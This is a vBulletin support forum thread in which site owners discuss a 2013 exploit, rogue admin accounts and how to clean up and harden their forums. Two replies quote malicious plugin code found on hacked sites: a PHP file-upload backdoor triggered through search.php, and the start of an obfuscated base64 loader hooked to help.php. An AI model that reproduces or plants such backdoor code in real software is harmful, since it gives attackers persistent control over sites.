A new type hack method?

Collapse
X
 
  • Time
  • Show
Clear All
new posts

  • TheLastSuperman
    commented on 's reply
    Also adding to my above comment, the /install/ directory was already removed from the site in question.

  • TheLastSuperman
    commented on 's reply
    Going through a site now with files that contained the code above you posted along with an non-base_64 coded version in the plugin manager titled Skimlinks_vb with contents:

    PHP Code:
    if (strpos($_SERVER['PHP_SELF'],"search.php")) {
    // vBulletin Security admincp
    if (!empty($_REQUEST['vbsearchdo'])){
    echo 
    '';
    echo 
    '';
    if( 
    $_POST['_upl'] == "Upload" ) {
    if(@
    copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '
    Good Upload'
    ; }
    else { echo 
    'Upload Failed '; }}}

    So that allows file uploads, check for shell scripts (the one you posted image of is a very bad shell script read more here - http://www.derekfountain.org/security_c99madshell.php because by accessing your help.php page the hacker was able to let the c99 madshell interact with your site.

  • TheMax74
    commented on 's reply
    Note: i had no /install directory before the hack!

  • vbull fan
    commented on 's reply
    My hacker registered as r00t and now when I try to go to my site it just says Access denied.

  • vbull fan
    replied
    Originally posted by Zachery
    Please read the following two blog posts:
    http://www.vbulletin.com/forum/blogs...ve-been-hacked

    http://www.vbulletin.com/forum/blogs...vbulletin-site

    Also please see these recent security announcements:

    vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
    vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions
    That is just great - I own my forum, but I do not know how to do that. Is VB going to cover the cost for me to pay my IT guy to do this for me? This is the 11th and I did not here anything about this until I* was hacked. I can't even access my site at this point. I own 7 VB sites - should I expect the other 6 to be trashed too????

    How do I remove this?? vbulletin-forumhome.js File not recognized as part of vBulletin

    Leave a comment:


  • TheMax74
    replied
    Please check admincp/help.php, by clicking the "?" somewhere in the admin control panel. I've downloaded yesterday the 4.2.x version and it shows up a very bad page!
    I noticed a plugin change with the following code:

    if (strpos($_SERVER['PHP_SELF'],"help.php")) {
    if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($T059EC46CFE335260){$T059EC46CFE335260=base64_decode($T059EC46CFE335260) ;$TC9A16C47DA8EEE87=0;$TA7FB8B0A1C0E2E9E=0;$T17D35BB9DF7A47E4=0;$T65CE9F6823D588A7=(ord($T 0......

    It seems that when accessing the HELP page, the plugin starts up some bad code.



    Click image for larger version

Name:	exploit.jpg
Views:	139
Size:	86.0 KB
ID:	3994957
    Last edited by TheMax74; Sat 14 Sep '13, 2:07am.

    Leave a comment:


  • djbaxter
    replied
    Originally posted by Phat Phreddy


    I restored a clean file system.. I removed the install folder.. the admins.. and I have been hacked 2 more times since..
    See http://www.vbulletin.com/forum/forum...47#post3994147

    Leave a comment:


  • Zachery
    replied
    Removing your version number, won't really do much, there are still plenty of ways to find your site, so that is sort of moot.
    We only give enough information, so as to make sure you're aware of the exploit. Full Disclosure only helps the people who really want to attack you guys. Not our customers.

    Leave a comment:


  • aspen
    replied
    Originally posted by Jntu Hub
    my site was hacked with new name
    I had him get on my site too, but no damage was done... because I always double bag it.

    NEVER EVER EVER EVER trust the security of vbulletin, wordpress, oscommerce, whatever, any software you install on your website. NEVER trust it. Always double up the admin login with .htaccesss password protection.

    I had admin accounts created on my website but, because I had password protected the admincp, they were never able to do anything. These aren't real hackers, they're script kiddies, they get a recipe off a black hat website and follow it. Double bagging might not stop a real determined hacker, but it'll stop these people.

    Another thing is to remove vbulletin's display of version information from public pages, which means they won't find your forum when they search for the specific version they have the exploit for.

    Someone may have mentioned these things already, I've not read the whole thread yet. But they bare repeating in anycase.

    Also yes, when an exploit is found, give more details, tell us what to look for.

    Leave a comment:


  • hqarrse
    replied
    Shocked to find this thread.

    The late notification from VB gave no information at all, just 'delete install'. Given that I had no signs of a hack, I did it and moved on.

    I came across this thread tonight and yes, like everyone else I have new admin users. In my case they don't seem to have done anything, perhaps because my admincp is renamed and well protected. Fingers crossed. I still have some checking to do, but it's looking promising.

    Just in case any of the VB staff are still monitoring this, your response has been very poor. It would take minimal effort to add some detail to your exploit report, or send a second email once the level of detail in this thread became available. There are no doubt plenty of forum admins out there who are happily going about their business safe in the knowledge that the exploit was sorted and no damage done. And plenty of those will have some new administrators and plugins to keep them company.

    I have been teetering on the edge of jumping ship given the progress of VB5 and because VB4 seems to no longer be in development. VBSEO also in troubled water. The appalling response to this exploit, coupled with some pretty 'f*** you' type responses from the staff in the discussions of this make me really keen to get on and use that Xenforo license I bought a couple of months ago.

    Edit: to add something constructive to my whinge, I did what maybe a useful plugin check for others. I looked at the sequence of plugin IDs in the prefix_plugin table, ordering by the id descending. Then I looked at the next auto_increment id and make sure that there isn't a gap between the last known, trusted plugin created and the next ID. If there is a gap, then there is a chance that something has been created and then deleted. Get the auto_increment id using:

    SELECT `AUTO_INCREMENT` FROM information_schema.`TABLES` WHERE TABLE_SCHEMA = 'your_database' AND TABLE_NAME = 'yourprefix_plugin';

    I also checked the controlpanel log for gaps over the periods from registration to most recent activity of my new admin users. That would give an idea if something was done, then the log pruned.

    Edit 2: I do have an entry in my control panel log for a user called . , one of the new administrators. He accessed forum.php on 1 Sep and the action was 'modify'. However if I search for that or the email address given in my server logs, I can't find an entry. Can anyone shed any light on how that could be? Of any way of checking what the modify actually was?




    Last edited by hqarrse; Wed 11 Sep '13, 2:25pm.

    Leave a comment:


  • grayloon
    replied
    Originally posted by Phat Phreddy
    I restored a clean file system.. I removed the install folder.. the admins.. and I have been hacked 2 more times since..
    On my hacked forum, I found that they had uploaded some PHP shell scripts. If you don't remove those shell scripts, you could be in a world of hurt. Those shells can give them access to modify almost anything on your server - not just vBulletin. Here's everything I did to clean this up:
    • remove vBulletin install directory
    • change the admin password
    • change MySQL password
    • remove hacker admin accounts
    • remove uploaded shell scripts
    • remove hacker plugins
    • remove hacker language variables
    • remove hacker notices
    • remove hacker announcements
    • block IP ranges that accessed the upgrade.php file or shell scripts

    Leave a comment:


  • DemOnstar
    replied
    Originally posted by Phat Phreddy
    I restored a clean file system.. I removed the install folder.. the admins.. and I have been hacked 2 more times since..
    Hello, When I entered my forum homepage a little while ago, I met with this page: http://imageshack.us/a/img842/6846/dqc4.jpg First I've checked my


    I see it so many times..... Too many times infact....
    But that is all I see......

    I have no htaccess things that I have done, I don't know how to do it. I have no hacks, no new admins, plugins, defacement issues. No intrusions whatsoever.
    I did remove the install folder at a very early stage in this recent exploit..

    Maybe I have been lucky so far? Maybe I just don't see what I am supposed to be looking for..? Maybe it will happen to me soon?

    There really is no finite explanation/solution here....

    Leave a comment:


  • Phat Phreddy
    replied
    Originally posted by Zachery

    We've advised customers to remove the install folder, that is our response. Once you remove it the exploit vector is gone.

    In the past it wasn't required to remove the install folder based on how the install/upgrade system worked. Overtime the system changed which allowed an issue to crop back up.

    I restored a clean file system.. I removed the install folder.. the admins.. and I have been hacked 2 more times since..

    Leave a comment:


  • tpearl5
    replied
    Just found a user on my site that was set as an admin and installed a backdoor: "smith123456"

    Leave a comment:


  • Ambro
    replied
    For those of you who are getting hacked AFTER removing your install directory, this is because the attacker has installed a persistent backdoor, usually a PHP modification done to one of the core vbulletin files or in some cases, in the form of a plugin.

    Step one would be to Secure your admincp and modcp folders with .htaccess. This should the the first step in your journey. Also read up on making the admin account (the owner of the forums) undeletable / uneditable via the conf file.

    After you've done this, login to your adminCP and go to Maintenance -> Diagnostics -> Suspect File Versions

    Run this and look for files which say "File not recognized as part of vBulletin". If you see something that's not part of an addon or modification you've personally applied to your forums, it's safe to assume it's malicious and doesn't belong. My advise at this point would be to re-upload and replace any files which are not recognized by VBulletin. Once you've been able to rid yourself of the backdoor, you should be in the clear.

    If you've completed the above steps and are STILL being hacked. Make a backup of your database, pictures, thumbnails, themes, etc and reinstall from a fresh source base. While this may be tedious, it assures that your replacing any backdoored script.

    PLEASE MAKE SURE to delete your install directory AFTER installation or read up on my post on page 4 about setting up a honeypot for logging ip's of people who visit install/upgrade.php.

    Leave a comment:

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...